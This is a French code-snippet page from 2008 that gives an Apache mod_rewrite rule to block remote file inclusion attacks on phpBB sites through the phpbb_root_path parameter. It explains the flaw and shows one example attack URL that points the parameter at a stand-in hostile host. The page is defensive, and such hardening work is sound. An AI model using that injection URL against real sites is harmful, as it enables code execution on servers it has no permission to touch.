Bouts de Codes

Sécurisation de votre site avec phpbb (phpbb_root_path)

Information sur le code source

Enregistré le 09 Juin 2008 - Vu 15289 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Sécurisation de votre site avec phpbb (phpbb_root_path)
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Les sites à base de CMS et de composant disponibles gratuitement sur internet sont sensibles aux attaques et aux vulnérabilités par inclusion de fichier distant (RFI). En effet leur code est connu de tous et analysé par les hackers pour détecter des failles. Celle-ci touche comme souvent les script contenant des chemin d'includes préfixés par une variable. En effet si le site à le paramètre register_globals à on, un paramètre GET peut alimenter facilement cette variable.
Dans cet exemple avec un forum phpbb les urls sont de la forme :
http://www.example.com/?phpbb_root_path=http://sitepourri.com/page.txt???

La meilleur protection reste de mettre register globals à off.

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
.24
 

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Sécurisation de votre site avec phpbb (phpbb_root_path)     #
#                                                                              #
# URL            : http://www.urlrewriting.fr/scripts58-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 09 Juin 2008                                                #
#                                                                              #
################################################################################

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*&)?phpbb_root_path=http://
RewriteRule ^.*$ - [F,L] 

Ajouter un commentaire

RSS
snippets


RSS
commentaires

 
Code de sécurité

Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Apache
  • Guide de référence : Apache 2 : Installation, configuration et administration sous Windows et Linux
  • Apache (version 2) : Installation, administration et sécurisation
  • Debian GNU/Linux - Services réseaux (Bind DNS, Apache, NFS, Samba, Messagerie...)
  • Apache en action
  • Montez votre serveur de A à Z
  • LAMP (Linux, Apache, MySQL, PHP) - Coffret de 4 livres : Maîtrisez vos applications Web Open Source [Nouvelles versions]
  • Précis & Concis : Apache
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Maîtrisez vos applications Web en Open Source
  • PHP 5.2 et APACHE 2 - Maîtrisez le développement et le déploiement de votre site web interactif [Nouvelle version]